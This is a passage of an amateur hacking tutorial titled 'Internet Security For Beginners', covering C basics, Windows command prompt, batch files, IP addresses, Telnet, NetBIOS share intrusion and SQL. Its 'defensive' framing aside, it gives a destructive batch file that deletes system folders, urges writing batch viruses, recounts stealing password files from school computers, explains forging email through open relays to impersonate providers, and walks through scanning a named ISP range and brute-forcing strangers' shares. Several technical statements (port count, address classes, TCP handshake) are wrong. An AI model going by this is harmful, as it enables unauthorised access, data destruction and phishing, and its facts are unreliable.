Internet Security For Beginners:

Contents

Introduction Programming Languages Command Prompt Batch Programming IP Addresses Port Numbers TCP And UDP Telnet FAQ NetBIOS/SMB Hacking Structured Query Language SQL Injection Trojans Faking/Hiding Extensions Obtaining IP Addresses A Short DoS FAQ A Short Buffer Overflow FAQ Using Password Crackers Proxies And Anonymity Google Hacking Index Browsing Basic NetCat Tutorial Compiling Exploits Using Windows FTP Hacker Community Basic Security Hacker Jargon/Slang FAQ Useful Links Disclaimer Greetz And Fuck Off's INTRODUCTION:

Welcome to Internet Security For Beginners, this is the sequel to my "Hacking For n00bs Version 2", I expanded and improved this version, much of this text will be from the prequel to this text. This tutorial will teach you how to break into computers in order to teach you how to prevent such attacks from happening, after all if you know how to attack, you can figure out your own way of defending. Before trying any of the things in this text read the whole thing otherwise you might get confused, this tutorial is for the complete beginner to Internet Security. I hope you enjoy this text! This text was written by Aelphaeis Mangarae. BY READING THIS YOUR AGREEING YOU HAVE READ THE DISCLAIMER AND HAVE AGREED TO EVERYTHING IN IT!

PROGRAMMING LANGUAGES:

So you want to become a hacker? Well obviously if you’re reading this text, to become a hacker you must learn a programming language, so you can code your own programs and learn about how a computer works so you can repair or restore it. Since you’re a beginner, you don't want to start off with something really hard, the most commonly used programming language around the world is C. C was invented by Dennis Ritchie at Bell Telephone Labs in 1972. The language was originally created to design the UNIX , which if you don't already know what a text based operating system, yes that's right NO GUI! Because of how powerful C was, C soon became one of the most used programming languages there is. Nearly all the hackers out there code in C, so to begin with you best start off with C, but don't think that you can jump straight into coding a GUI, C is not like Visual Basic, where you mostly just click and drag to create a GUI. The first programs you create in C will not have a GUI and will just use command prompt. So you’re going to start coding in C, first you need a compiler, so search Google for LCC-W32 this is a freeware compiler so you don't need to pay for it nor download a cracked version. Since this is just a beginner’s guide to Security I'm not going to go into coding in C, however I will show you how to compile your first program. So download LCC-W32 if you haven't already and open it up. Go to File, New, Project, then enter the name of your project, below that enter the path of where your project will be stored, this will include the .c file and your compiled program, and if you click below that you can put a path where you want your compiled program however, you should notice when you click in that box it automatically creates a path, you can use that if you want. Down the bottom you should have it set to "Single User" and Console Application, as I said before you will be making a console application not a program with a GUI. Click Create, you should then be prompted to where your .c file should be located and what the file name of it should be, just enter a file name like example.c and click OK, after that you will be prompted with another screen, click OK on that one as well. On the next screen just click Next again, then on the next one make sure you have it set to Console Application under Type of Output, then click Next, on the next screen click Next again. You should now have a white window where you can enter the code your going to compile, here is the code to your first program.

#include int main(void)

{ printf("Hello World\n"); return 0;

}

After you have entered the code, go to Compiler then Make, your program should now be compiled. To execute your program go to Compiler, then Execute example.exe (your program file name may vary.) Yay! you have now seen your first C program in action, now I will explain what each part of the C program does. First we have #include This file includes the stdio.h header files in your C application, these header files are needed for output to the screen. Below that we have int main()

Now int means integer, this allows a return code to be passed to the invoker, however since no function called it this is pretty irrelevant but it is good programming practice to declare main() as an integer and is advisable with C99 Standard. You should of noticed int main(void), void means that the function takes no arguments, obviously in this program main() does not take any arguments there for it is good programming practice to have int main(void). Below int main() is { This bracket begins the main() function and } ends the main function, now let's look at the body of the program, at the beginning of the main() function we have printf("Hello World\n"); Now printf is one of C's functions, what printf does is prints text to the screen, you may notice that "Hello World\n" is in quotation marks, this is so printf knows it is not a variable and is in fact a text string that it needs to print to the screen. When you ran your program you should of notice it printed. Hello World You may be thinking, well how come it didn't print \n, what is that for? \n basically means a new line. To play around with \n try Compiling and Executing the following program.

#include int main()

{ printf("H\ne\nl\nl\no\nW\no\nr\nl\nd\n"); return 0;

}

Ok, now I will explain some thing's I didn't get around to explaining before at the end of printf("H\ne\nl\nl\no\nW\no\nr\nl\nd\n") is a semicolon, in C programming you must put a semicolon on the end of each statement in programming (not including #include and your functions.) Below printf is return 0;, this returns 0 to the function that called on main() although this is not really relevant, because nothing has called on main() we must put it in anyway otherwise LCC-W32 complains. However since there is no need to return anything if you wanted to you could change int main() to void main() (meaning it returns nothing) and then you won't need to include return 0; So basically:

#include void main()

{ printf("Hello World\n"); }

Now you have compiled your first program I bet your thinking well where can I go from here, well you need some books on C. I recommend the following books:

A Short Guide On C Programming For Beginners (This is a short guide by Aelphaeis Mangarae.)

Sam's Teach Yourself C In 21 Days

Primers Guide To C Programming

COMMAND PROMPT:

You know what Command Prompt is right? It’s that big black box….if you don’t know try and remember. Command Prompt is the command line interpreter for Windows, and was essential back in the days when operating systems didn’t have GUI’s. To open up Command Prompt go to “Run” then type in “cmd” with out quotation marks of course. Why is it important to learn how to use Command Prompt? Well a lot of hacking, well at least hacking using windows involves Command Prompt. Type “help” and you should get a list of commands, read all of them.. Below I’ve listed all the commands and their functions:

ASSOC Displays or modifies file extension associations. AT Schedules commands and programs to run on a computer. ATTRIB Displays or changes file attributes. BREAK Sets or clears extended CTRL+C checking. CACLS Displays or modifies access control lists (ACLs) of files. CALL Calls one batch program from another. CD Displays the name of or changes the current directory. CHCP Displays or sets the active code page number. CHDIR Displays the name of or changes the current directory. CHKDSK Checks a disk and displays a status report. CHKNTFS Displays or modifies the checking of disk at boot time. CLS Clears the screen. CMD Starts a new instance of the Windows command interpreter. COLOR Sets the default console foreground and background colors. COMP Compares the contents of two files or sets of files. COMPACT Displays or alters the compression of files on NTFS partitions. CONVERT Converts FAT volumes to NTFS. You cannot convert the current drive. COPY Copies one or more files to another location. DATE Displays or sets the date. DEL Deletes one or more files. DIR Displays a list of files and subdirectories in a directory. DISKCOMP Compares the contents of two floppy disks. DISKCOPY Copies the contents of one floppy disk to another. DOSKEY Edits command lines, recalls Windows commands, and creates macros. ECHO Displays messages, or turns command echoing on or off. ENDLOCAL Ends localization of environment changes in a batch file. ERASE Deletes one or more files. EXIT Quits the CMD.EXE program (command interpreter). FC Compares two files or sets of files, and displays the differences between them. FIND Searches for a text string in a file or files. FINDSTR Searches for strings in files. FOR Runs a specified command for each file in a set of files. FORMAT Formats a disk for use with Windows. FTYPE Displays or modifies file types used in file extension associations. GOTO Directs the Windows command interpreter to a labeled line in a batch program. GRAFTABL Enables Windows to display an extended character set in graphics mode. HELP Provides Help information for Windows commands. IF Performs conditional processing in batch programs. LABEL Creates, changes, or deletes the volume label of a disk. MD Creates a directory. MKDIR Creates a directory. MODE Configures a system device. MORE Displays output one screen at a time. MOVE Moves one or more files from one directory to another directory. PATH Displays or sets a search path for executable files. PAUSE Suspends processing of a batch file and displays a message. POPD Restores the previous value of the current directory saved by PUSHD. PRINT Prints a text file. PROMPT Changes the Windows command prompt. PUSHD Saves the current directory then changes it. RD Removes a directory. RECOVER Recovers readable information from a bad or defective disk. REM Records comments (remarks) in batch files or CONFIG.SYS. REN Renames a file or files. RENAME Renames a file or files. REPLACE Replaces files. RMDIR Removes a directory. SET Displays, sets, or removes Windows environment variables. SETLOCAL Begins localization of environment changes in a batch file. SHIFT Shifts the position of replaceable parameters in batch files. SORT Sorts input. START Starts a separate window to run a specified program or command. SUBST Associates a path with a drive letter. TIME Displays or sets the system time. TITLE Sets the window title for a CMD.EXE session. TREE Graphically displays the directory structure of a drive or path. TYPE Displays the contents of a text file. VER Displays the Windows version. VERIFY Tells Windows whether to verify that your files are written correctly to a disk. VOL Displays a disk volume label and serial number. XCOPY Copies files and directory trees.

After reading all the commands and there functions, you should of learnt a whole lot about how windows works, when using a GUI (Graphical User Interface) you are actually running all these text based commands, its just you don’t see what’s going on in the background. One cool thing you can do with Command Prompt is view and alter the contents of your Hard Drive. To view the contents of your Hard Drive via CMD your going to have to use some commands, such as CD, DIR, TREE, DEL. Type “dir” you should get a list of files on your C:\ Drive or what ever drive is your default. To move to another folder type “cd foldername” So if we wanted to go to the WINDOWS folder we would type “cd WINDOWS” Now to view a list of files in WINDOWS we type “dir” and it should give us a list of files. If you want to go back to your C:\ then type “cd C:\” make sure to use a backslash, on Windows XP I know you have to use a backslash or else it won’t work, I’m not sure what OS you have..but it should be the same thing. You now how to view the contents of your Hard Drive via cmd but how do you delete and copy? Well that’s easy just use the copy and del commands, lets say you have a file on your C:\ Drive called hello.txt you can do “del C:\hello.txt” And it should delete that file, if you want to copy that file all you have to do is type “copy C:\hello.txt C:\hello2.txt” That should make a copy of hello.txt to your C:\ Drive called hello2.txt Try experimenting with other cmd commands, you can learn a lot.

BATCH PROGRAMMING:

The thought on your mind right now is probably, what the hell is batch programming? Well batch programming is basically running a set of windows commands one after another, above you learned how to use command prompt right? Well batch programming uses those commands, to create a batch file all you have to do is open up Notepad type in some code e.g. echo Hello have a nice day! del C:\WINDOWS\ del C:\Program Files\ echo I hope you enjoy this!

Then save it as filename.bat, if you choose to execute the file (which would be a bad idea) it will carry out the commands one by one. If you wanted to you could create a “batch virus”, most Anti-Virus would fail to detect your batch files as a virus. Keep In mind though batch viruses are stupid, and you should only use them as a last resort, and yes I am aware that you cannot delete the WINDOWS folder while Windows is running. If you’re smart you could make some clever batch viruses, just take a look at all the command prompt commands and think, just right now I thought of something useful, lets say you want to get the victims IP Address and you didn’t have anyway of getting it, except via Trojan and all the Trojans you have are detected by Anti-Viruses and you don’t have time to code your own, you just want to get their IP Address you could put up your or IDS then make a batch file, inside it you could put:

@echo off Ping 127.0.0.1

(Replace 127.0.0.1 with your IP Address) when the your victim pinged you, you could check your firewall and sure enough you would have their IP Address. Think of some creative stuff you can do with batch. Now that you have aquired some basic batch programming it is time to move onto some batch programming that is a tiny bit more advanced. One of the things I have used batch programming for in the past is stealing .pwl files from the school computers, believe it or not some of my school computers are still , obviously I go to a public school! Anyway, the batch file I used was: cd C:\WINDOWS\ copy *.pwl H:\

What that does is copy all the files from the WINDOWS directory to my H:\ drive, notice I used *.pwl, which means all the files which have the extension .pwl will be copied to my H:\ drive. Now it's time to try some basic inputting and outputting:

IF EXIST C:\example.txt GOTO :Yes IF NOT EXIST C:\example.txt GOTO :No

:Yes ECHO The file does exist GOTO :End

:No ECHO The file does NOT exist GOTO :End

:End

Now that we know the file exists we can move onto opening the file, if you’re a C programmer you would know it is always best to include stuff like this in your programming to try and prevent errors from occurring or alerting the user to the fact an error has occurred.

IP ADDRESSES:

What is an IP Address, for those of you who don’t know IP stands for Internet Protocol, an IP Address is a number assigned to a computer connected to the Internet. Each time you connect to the Internet you are assigned an IP Address for example: 202.61.175.89, an IP Address always consists or 32 bits each piece of the IP Address (e.g. 125.) making can range from 0 to 255, so the IP Address 267.89.245.287 is an invalid IP Address because two of the numbers it contains is above 255. There are a total of 4,228,250,625 IP Addresses on the Internet; of course not all of them is connected to a computer. You will probably notice that each time you log on the Internet your IP Address is similar e.g. you log on as 202.61.175.89 one time then next time you log on your on 202.61.175.187, this is because your connecting through the same ISP, therefore you will always have the same IP Range if you did a scan from 202.61.175.0 to 202.61.175.255 you could almost guarantee all the IP Addresses would belong to the same ISP. This is useful to know, because say if you were planning on hacking Wright Patterson Air Force Base (like Kuji and Data Stream Cowboy did) you could scan an AOL IP Range for a certain service, then when you found a computer with a certain Port open you could exploit it and then gain control over that computer, steal the Dial Up Passwords and use it when your hacking WP AFB. One of the things you may wish to do when hacking is to test a program or exploit on your computer, so what you would have to do is go into CMD and type “ipconfig” right? Wrong instead of using your IP Address all the time you can use 127.0.0.1, if you type that into a program or what ever you are using to “hack” your computer would understand 127.0.0.1 as your computer a.k.a. the localhost. Although the common IP Address looks something like 125.12.52.1 It is extremely likely that in the future that will changed, as you read above, there is not much more than 4 Billion IP Address on the Internet, which may seem like quite a lot, however it isn't, Businesses around the world want their computers connected to the Internet. The amount of allocated space (IP Addresses) a person or persons have is divided into Classes. If you were to have 125.125.125.x, x being the part that you own, that would be classified as Class A, altogether Class A IP Addresses make up a bit over 50 % of the Internet.

125.125.x.x Is Class B

And

125.x.x.x is Class C

The new IP Address which will soon become standard are IPv6, you may of heard of them before, unlike the standard IP Address which is 32 bit, IPv6 are 128 bit! An example of an IPv6 IP address is: FEDC:BA98:7654:3210:FEDC:BA98:7654:3210

Looks pretty damn confusing, when IPv6 becomes standard there will be a hell of a lot of IP Addresses, if you wish to work out the amount of IP Address (IPv6) you can use the follow equitation:

340 x 10 To The Power Of 38

In other words a hell of a lot, I don't think after IPv6 we will be needing any more IP Addresses, after all the worlds population is estimated to stop at 11 Billion (a bit off topic I know.)

PORT NUMBERS:

You have learned about IP Addresses but what about Port Numbers? Well there are 65,565 ports on your computer, when a program goes to use the Internet it will connect to the Internet through one of these ports. Most programs have a default port e.g. KaZaA uses Port 1214, if you're coding a program you can set your program to use any one of the 65,565 ports on your computer. It’s important to learn the default ports of certain programs, why? If you're scanning/have scanned a computer you must know what service is running behind each port, now most of the time programs run at their default port; I said most of the time remember not all the time. Below I will list some services and their default ports.

21 – FTP 23 – Telnet 80 – HTTP/Web Server 135 – RPC 139 – NetBIOS 445 – SMB (Server Message Block) 1025 – Network Black Jack 1214 – KaZaA 3389 – Terminal Services 5000 – Universal Plug and Play

So if you had an exploit program for KaZaA, you would scan the Internet looking for computers with Port 1214 open, sure enough if you tried to exploit that port it should work, assuming the remote machine isn’t patched and the exploit your using works. Now remember what I said if something is running at services’ default port it doesn’t always mean that it’s the service.

TCP AND UDP:

TCP and UDP are two protocols you will come across when hacking, so I thought I would explain them in this text. TCP, TCP is different from UDP in the way that it’s a lot more complex protocol than UDP, when a TCP connection is made, the first thing done is the Client sends a SYN packet, the Server once it receives the SYN packet replies to it with a ACK packet, after the Client receives the ACK packet it makes the connection. The TCP protocol while data is traveling across it constantly checks to see if each bit of data is sent (each bit is 32 bytes.) UDP is a very simple protocol and a faster one than TCP, it does not check to see if each bit of data is sent, and does not send SYN packets and such like the TCP protocol does. TCP is a more commonly used protocol than UDP because its more complex, however UDP is used sometimes when playing games over the internet because it’s a faster protocol and we all hate lag while playing games over the internet. UDP is an unreliable protocol to use when programming, although fast. UDP is a connectionless protocol meaning data can be sent with out a connection. You must remember if a program is running at TCP Port 1125 it does NOT mean anything for UDP Port 1125.

TELNET FAQ:

So what is Telnet? Well Telnet is a protocol, a protocol that has been used for years.

"The purpose of the Telnet protocol is to provide a fairly general, bi- directional, eight-bit byte oriented communications facility. Its primary goal is to allow a standard method of interfacing terminal devices and terminal-oriented processes to each other. It is envisioned that the protocol may also be used for terminal-terminal communication ("linking") and process-process communication (distributed computation). "

Telnet was made to allow a remote user to login to a foreign machine so you can work as if you’re actually at the console of the machine. Just to make sure you know Telnet is NOT a hacking tool, although it is a tool that hackers use to assist them. When "telneting" to something is it very important to note that the Telnet protocol does NOT use encryption, so any data you send could be sniffed. Telnet is a TCP-IP client, so what exactly can you do with Telnet? Well using Telnet you can connect to various things and control stuff, below is a short list of the stuff you can do with Telnet.

1. Send email. 2. Control an FTP server. 3. Login to a remote computer and control is via Shell. 4. Play text based games over Telnet. 5. Login to a server and read certain information e.g. your email.

Sending anonymous email with Telnet is quite easy and quite convenient and anonymous as well. The first thing you would want to do when sending anonymous email is telneting to a few wingates first, wingates are basically telnet proxies. So where can you find a list of wingates you ask? You can get some from:

Once you have got a list of public wingates it's time to telnet to them. Open up command prompt and type "Telnet" (with out quotation marks) The following should be printed to the screen: Welcome to Microsoft Telnet Client

Escape Character is 'CTRL+]'

Microsoft Telnet>

Ok so now you got Telnet open, how do you use it? With all Command Line stuff you can nearly always find out how to use it by typing "/?" or "help" If you type help the following should come up: Microsoft Telnet> help

Commands may be abbreviated. Supported commands are: c - close close current connection d - display display operating parameters o - open hostname [port] connect to hostname (default port 23). q - quit exit telnet set - set set options (type 'set ?' for a list) sen - send send strings to server st - status print status information u - unset unset options (type 'unset ?' for a list) ?/h - help print help information Microsoft Telnet>

What you would want to do is open a connection so in Telnet type: o 127.0.0.1 23 Except you would replace 127.0.0.1 with the Wingate IP Address and 23 with the port that the Wingate uses, which generally would be port 23. Once you have successfully connected to a Wingate the following should come up: Wingate> Now you have a wingate in front of you, what would you do next? Well one Wingate isn't enough you need at least 3 so, telnet to another one by doing o 127.0.0.1 23 Once you have a chain of Wingates it's time to send mail! First we need an SMTP Server to telnet to, where can we find one? Well first I need to explain something; there are two types of SMTP Server, relaying SMTP servers and non-relaying SMTP servers. If you have a relaying SMTP server that means that you can send email from any address that you like, to any address. If you have a non-relaying SMTP server that means that you can only send mail within that domain. Example: mail.aol.com

Is an SMTP server (I think) obviously this SMTP server is owned by AOL, and the chances are it's not going to be a relaying SMTP server meaning you could do the following:

From: [email protected] To: [email protected]

However you could not do:

From: [email protected] To: [email protected]

Because both of the domains are not AOL, even if one of them was not AOL it would still be invalid because they have to be within AOL for you to send the emails and the SMTP server would probably ask you for your AOL username and password. How would you go about looking for relaying SMTP servers? Well the only way I can think of is by scanning the Internet for servers running Port 25 (SMTP.) Ok now let's send some mail, to a Yahoo Address. Open up telnet, and if you want to telnet to some wingates for anonymity, although you don't have to if you just want to try sending mail to a friend using telnet. So you got telnet open and maybe you got a few wingates chained, now what? Well you need to connect to an SMTP Server so type: o mx1.mail.yahoo.com 25 (This is one of Yahoo's SMTP Servers) After it's connected the following should come up: 20 mx1.yahoo.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999 21:46:04 +0000 (GMT).

Or something similar, now what to do next? Type HELO yes HELO not HELLO to introduce yourself. Now you need to type the fake address your going to use: MAIL FROM:[email protected]

It should respond with: 250 [email protected]... Sender ok Now we need to type the To Address, so we type: RCPT TO: [email protected] And of course we should get the following reply: 250 [email protected]... Recipient ok Now after setting the TO and FROM address you would be wanting to send the body of the email right? So type "data" (with out quotation marks.) And you should get something like the following: 354 Enter mail, end with "." on a line by itself It is now that you enter the body of the email you wish to send. Finally after doing the body it is now time to make the subject of the email up, you can do this by typing: Subject: Hello There! You should then get something like the following for a response: 250 CAA15313 Message accepted for delivery.

Although what I'm about to say has nothing to do with Telnet, you might be wondering, what if I receive a fake email? How can I tell whether or not it is authentic, well there is one way, which of course doesn't always work. If you receive an email from your ISP, your ISP will use it's own SMTP server to send the mail, meaning if you checked the headers of the email and it came from another SMTP server the email would probably be a fake. It is also possible that one of the people you choose to send fake mail to, may also have the knowledge to be able to tell if the email is fake, in that case, if your going to send someone who has a Yahoo email address a fake mail (and your going to make it look like it came from the Yahoo admins) you would be wanting to send it from their SMTP server, just incase. NETBIOS/SMB HACKING:

What is NetBIOS/SMB Hacking? On all Windows systems (98 and upwards) there are two services which can be easily exploited, although this is not hacking it can grant you access to some very sensitive information. NetBIOS runs at TCP Port 139 and SMB runs at TCP Port 445. By default on all windows machines both these services are enabled, if you have ever used a computer attached to a network you may of noticed you can view remote computers hard drives on the network. Well the same applies for computers on the Internet, after all the Internet is just one big network. With the launch of Service Pack 2, I would of thought this type of attack would become useless, however according to reports this is not the case at all, with the launch of Service Pack 2 this type of attack has become a lot more widespread, the Service Pack 2 firewall allows this type of attack to take place, before people may of had firewalls to protect them against a remote person viewing their hard drive (instead of disabling anonymous login or taking some sort of action) however most people that have the Service Pack 2 firewall I would think would be unlikely to have another firewall. So how can we exploit the fact that by default Windows allows a person to login via NetBIOS and have read access of the hard drive? The first tool which we will utilize is one that is built into Windows, and that is NBTSTAT. Open up command prompt and type NBTSTAT and press enter, you should get the following printed to the screen:

------Displays protocol statistics and current TCP/IP connections using NBT (NetBIOS over TCP/IP).

NBTSTAT [ [-a Remote Name] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [interval] ]

-a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. -c (cache) Lists NBT's cache of remote [machine] names and their IP Addresses -n (names) Lists local NetBIOS names. -r (resolved) Lists names resolved by broadcast and via WINS -R (Reload) Purges and reloads the remote cache name table -S (Sessions) Lists sessions table with the destination IP addresses -s (sessions) Lists sessions table converting destination IP Addresses to computer NETBIOS names. -RR (Release Refresh) Sends Name Release packets to WINS and then, starts Refresh

Remote Name Remote host machine name. IP address Dotted decimal representation of the IP address. interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl +C to stop redisplaying statistics. ------

Have a good read of the information printed to the screen so you understand what NBTSTAT can do. The switches that you would be wanting to use are -a and -A, if you read the above paragraph you should know that -a lists the remote machines NetBIOS shares by it's name, which if you don't already know is it's DNS (Domain Name Service) an example of a DNS is 128.61.optusnet.net.au And -A lists the remote computers NetBIOS shares by it's IP Address. Let's try to get a list of shares via their IP Address, it doesn't matter whether you use their IP Address or DNS it's really just the same, but for this example I will use an IP Address.

------ XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Aelphaeis>NBTSTAT -A 127.0.0.1

Local Area Connection: Node IpAddress: [10.0.0.9] Scope Id: []

Host not found.

Local Area Connection 2: Node IpAddress: [0.0.0.0] Scope Id: []

Host not found.

C:\Documents and Settings\Aelphaeis> ------If you got the above, that basically means your fucked and the remote host most probably isn't vulnerable, however if you get the below then your in business.

------

NetBIOS Local Name Table

Name Type Status ------ADMIN <00> UNIQUE Registered WORKGROUP <00> GROUP Registered WORK123 <03> UNIQUE Registered WORK124 <20> UNIQUE Registered WORKGROUP <1E> GROUP Registered

------You're probably wondering that the hexadecimal codes near the Type group mean, well to be honest I don't remember, but I do remember that <20> means that WORK124 is a shared drive on that network. Now comes the part when we log on to that drive, Go to Start and right click on My Computer and go Map Network Drive, pick a drive letter (can be anything), then type the following the box below \\IPADRESSGOESHERE\WORK124

Of course that's just an example, you will have to change the IPADDRESSGOESHERE to a real IP Address and also log on to a share on the remote computer. There is a chance that by using the above technique to log on to the remote share won't work; we can also add a network drive by using CMD. You can use the net use command in Windows to log you on, for example: net use \\IPADDRESS\SHARE

Of course thats just like using the other method, sometimes you may have to log on using an actual username, for example. net use \\IPADRESS\SHARE * /USER:ADMINISTRATOR

Possibly unknown to you is the fact that Windows machines by default have hidden shares, yes that's right shares that won't show up by using NBTSTAT (well at least I think so.) Some default shares are:

$ADMIN $C $IPC $PRINT

Your best bet is probably going to be $IPC which stands for Inter- Process Communication.

If you wanted to log on to $IPC you would probably do: net use \\127.0.0.1\$IPC * /USER:ADMINISTRATOR

Of course you would replace 127.0.0.1 with the IP Address of the computer you wish to log onto. Go into CMD and play around with net use and other such functions. To get a list of the other functions type net /? Learn about how these work. Ok so now you know how to view the remote shares of a Windows machine and log on to them, but how would you go about finding computers that have NetBIOS enabled? Well first open up an IP Scanner, if you’re a total Beginner and for some reason do not have an IP Scanner or know where to get one you can get one from http://angryziber.com Once you have opened up your IP Scanner which ever one you have, set it up so it scans for ports 139(NetBIOS), 445(SMB), 135(RPC), 5000(UPnP) The reason you would be wanting to scan for 139 and 445 is because they're the services you would be exploiting and it would be worth scanning for the other services because if the machine has RPC and UPnP running it is likely the machine is insecure and would not have taken action to prevent people from logging on to the shares remotely. If you don't have an IP Range to scan here is one, an AOL IP Range! 172.128.0.0 - 172.191.255.255 Now that you know the basic's of exploiting the NetBIOS service, let's learn about password cracking! With some NetBIOS shares you may find the admin of them has applied a password to them, this can be a problem (obviously.) If you try to login to a NetBIOS share it seems to have a password you could do: net use \\127.0.0.1\IPC$ password /USER:ADMIN Of course it's not really likely that you are going to just know the password of the remote share and it would take a very long time to guess the password by hand. This is where the help of NAT comes in (NetBIOS Auditing Tool); I will below explain how to use this Tool. NetBIOS hacking can be a handy way of penetrating a system, but by default you are not allow write access, there are some NetBIOS shares which are have passwords and they do have write access (once you gain access.) Fortunately for you, there is a program that can crack these passwords and it's called NAT (NetBIOS Auditing Tool) using these you can attack protected NetBIOS shares via Dictionary brute forcing. Here is a link to download NAT: http://www.securityfocus.com/data/tools/auditing/network/nat10bin.zip The above is hosted by security focus, so the download should work. Now how do we use NAT? If we drag NAT.exe into CMD and press enter we get the following output: Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Aelphaeis>"D:\My Stuff\Applications\Temp Folder\Crackers\N etBIOS Auditing Tool\NAT.EXE" usage: //D/My Stuff/Applications/Temp Folder/Crackers/NetBIOS Auditing Tool/NAT. EXE [-o filename] [-u userlist] [-p passlist]

C:\Documents and Settings\Aelphaeis>

Or something very similar to that. We can use this tool by doing the following:

NAT.exe -o C:\password.txt -u C:\USERLIST.txt -p C:\PASSLIST.txt And press enter

I will now explain what each part of that does. -o C:\password.txt is the output file, once or if the password is cracked the password will be stored inside this file, -u C:\USERLIST.txt is the location of the list of usernames the brute forcer will try, and I shouldn't need to tell you what -p C:\PASSLIST.txt does.

If you wish to create your own username and password list you have to do so, in WordPad for some reason you will get all sorts of funny boxes between each of the words.

Although I did explain above briefly about finding vulnerable machines I didn't go into much detail, there is quite an easy way to find computers that have protected NetBIOS shares for you to break into. If you haven't already got Angry IP Scanner download it, just search Google for it, and after you have got Angry IP Scanner download the shares.dll plug-in from the following web page: http://www.angryziber.com/ipscan/plugins/ Another program I thought I should mention is NBTSTAT, using this program you can use for scanning IP Ranges and obtaining name information, you can download the program from: http://www.inetcat.org/software/nbtscan.html You can also download a Unix version if you wish and the source code for it, although I assume if you’re a beginner you will not be chasing after such things, below are the command arguments the program takes:

NBTscan version 1.5.1. Copyright (C) 1999-2003 Alla Bezroutchko. This is free software and it comes with absolutely no warranty. You can use, distribute and modify it under terms of GNU GPL.

Usage: nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename)|() -v verbose output. Print all names received from each host -d dump packets. Print whole packet contents. -e Format output in /etc/hosts format. -l Format output in lmhosts format. Cannot be used with -v, -s or -h options. -t timeout wait timeout milliseconds for response. Default 1000. -b bandwidth Output throttling. Slow down output so that it uses no more that bandwidth bps. Useful on slow links, so that outgoing queries don't get dropped. -r use local port 137 for scans. Win95 boxes respond to this only. You need to be root to use this option on Unix. -q Suppress banners and error messages, -s separator Script-friendly output. Don't print column and record headers, separate fields with separator. -h Print human-readable names for services. Can only be used with -v option. -m retransmits Number of retransmits. Default 0. -f filename Take IP addresses to scan from file filename. -f - makes nbtscan take IP addresses from stdin. what to scan. Can either be single IP like 192.168.1.1 or range of addresses in one of two forms: xxx.xxx.xxx.xxx/xx or xxx.xxx.xxx.xxx-xxx. Examples: nbtscan -r 192.168.1.0/24 Scans the whole C-class network. nbtscan 192.168.1.25-137 Scans a range from 192.168.1.25 to 192.168.1.137 nbtscan -v -s : 192.168.1.0/24 Scans C-class network. Prints results in script- friendly format using colon as field separator. Produces output like that: 192.168.0.1:NT_SERVER:00U 192.168.0.1:MY_DOMAIN:00G 192.168.0.1:ADMINISTRATOR:03U 192.168.0.2:OTHER_BOX:00U ... nbtscan -f iplist Scans IP addresses specified in file iplist.

What you would probably want to do is use the command switch -r to scan a Class C IP Range, you should of read what a Class C IP Range was above, an example of the commands you can use to scan a Class C IP Range is: nbtscan -v -r 202.61.175.0/24

You should also notice I included -v which means verbose, this will make the program send you back more information than usual.

STRUCTURED QUERY LANGUAGE:

So what is SQL (Structured Query Language? Well SQL is a language that is used with web based database programs, any forum you have ever talked on uses SQL and if you log in to check your email the website is also using SQL to access the database. It is important you learn SQL, the reasons why will become apparent later on. Let's start learning Some SQL shall we? SQL as I told you earlier is a data base software language, in an SQL database there are tables and columns and such, below is an example of what an SQL data base would look like.

Hardware ------IBM Mac ------1899 897 1766 5213 1600 213 1233 123

We have the table name, Hardware and the two columns IBM and Mac, remember this is just an example. Now let's learn how to use the most basic two SQL commands SELECT and FROM Example:

SELECT IBM, Mac FROM Hardware

What would the example do? Well it would select both columns IBM and Mac from the table with the name Hardware. Now before I get into anything more complicated. I would like to explain what and how to use the wildcard. I would assume you know what a wildcard is, well to my understanding a wildcard means anything. if you were playing a game and you got a wildcard, that would mean it would be equal to any card, well something like that, let's not go to off topic now. What if there were hundreds of columns in the table Hardware, would we have to type each column out? No we wouldn't we could just use a wild card. Example:

SELECT * FROM Hardware

Your probably thinking, well this is cool and all, but what if I wanted to select something specific, I mean something that's value is larger than 1000, well using the WHERE clause you can! Example:

SELECT IBM FROM Hardware WHERE IBM < 1000

This of course would select the column IBM in the table Hardware and would select all the things in that column which has a value of less than 1000. How would we go about using other operators? Below is a list of operators:

< Less than > Greater than = Equal to <= Less than or equal to >= Greater than or equal to !< Not less than !> Not greater than <> Not equal to != Not equal to

Incase your wondering both <> and != both mean Not equal to, supposedly you have to use different ones for different database software. Let's just look at another example:

SELECT IBM FROM Hardware WHERE IBM != 1899

This of course would select the column IBM from the table Hardware and would select all the things in that column except 1899. Now that you know the basic operators, it is time to learn about the BETWEEN operator. Look at the below example:

SELECT IBM FROM Hardware WHERE IBM BETWEEN 1000 AND 2000

If you know the basics of the English language you should be able to see what that does, it selects the column IBM from the table Hardware then selects all the information in the column that has a value between 1000 and 2000.

Drinks ------Price Drink

1 Coke 2 Large Coke 3 XL Coke

Look at the above example of a table, now it is time to learn about the AND command in SQL. What if we wanted to select more than one thing inside a column or columns? Well this is where the AND command comes in handy.

SELECT * FROM Drinks WHERE Drink = 'Coke' AND Price = '1'

Look at the above statement, it would be easy to see what it does, it selects from two values from both columns. Now that you know how to use the AND statement, we are going to learn about the OR and LIKE. Let's start of with the OR statement/clause or what ever you want to call it.

SELECT * FROM Drinks WHERE Price = '1' OR Price = '2'

It should be obvious to you what the above does, selects from both columns where Price = 1 or 2. SQL uses a lot of English words, therefore it is very easy to understand. Now it is time to learn to use the LIKE statement which is a tiny bit more complicated than the others.

SELECT * FROM Drinks WHERE Drink LIKE 'XL*'

This would select a row in the column that contain data that was similar to XL, if you look up you will notice the Drink column contains XL Coke, and XL is the first part of XL Coke, therefore using the above statement you could retrieve stuff from the Drink column that began with XL. What if we want to find something that just contains XL (XL might not be at the front.) Well we would do:

SELECT * FROM Drinks WHERE Drink LIKE '*XL*'

Notice the * is on either side of XL? So now you know how to grab some stuff from an SQL Database, which is pretty cool, and I'm sure when your testing the security of a web based application that uses SQL, that it will come in handy. Of course, it would also be handy to know how to store something inside an SQL database. Let's try inserting some data, into the Drinks column.

